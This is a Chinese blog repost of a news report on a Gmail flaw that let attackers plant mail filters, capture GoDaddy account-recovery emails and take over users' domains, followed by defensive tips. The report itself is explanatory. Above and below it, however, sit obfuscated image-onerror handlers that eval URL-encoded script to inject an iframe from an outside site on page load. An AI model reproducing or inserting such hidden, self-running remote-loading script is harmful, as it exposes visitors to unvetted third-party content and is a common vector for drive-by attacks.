谷歌Gmail曝安全漏洞致用户域名丢失- 零售银行转型- rapt - 和讯博客
谷歌Gmail曝安全漏洞致用户域名丢失 [转贴 2010-05-21 07:59:10]   
谷歌Gmail曝安全漏洞致用户域名丢失

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_250_250.html%20width%3D250%20height%3D250%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

北京时间11月24日消息,据国外媒体报道,安全研究人员布兰顿(Brandon)周一指出,谷歌Gmail电子邮件服务存在安全漏洞,允许黑客在用户毫不知情的情况下创建恶意帐户过滤器。

布兰德称,当用户为Gmail帐户创建过滤器时,会向谷歌服务器发送一个请求。该请求以URL形式存在,并伴随很多变量。出于安全因素考虑,浏览器通常不会显示全部变量。

但使用FireFox和Live HTTP Headers插件即可看到全部变量。黑客获得这些信息后,可通过这些变量识别出用户名。通过创建恶意过滤器,黑客可xx用户在域名注册机构GoDaddy注册的域名。

黑客首先登录GoDaddy的“重新获取用户号码”页面,输入域名地址后,GoDaddy会把“用户号码”发送到用户电子邮件中。由于已经建立了过滤器,黑客获得该号码后,再返回GoDaddy的“重新获取密码”页面,输入“用户号码”后,GoDaddy又将把密码发送到用户电子邮件中。这样,黑客就拥有了该域名的用户号码和密码。

目前,已经有Gmail用户表示,他们在GoDaddy上注册域名丢失。对此,布兰顿表示,为避免该问题,用户应该经常检查帐户过滤器。对于Firefox用户,可以下载NoScript扩展防止攻击。



0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zw_468_60.html%20width%3D468%20height%3D60%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

郑重声明:资讯 【谷歌Gmail曝安全漏洞致用户域名丢失- 零售银行转型- rapt - 和讯博客】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——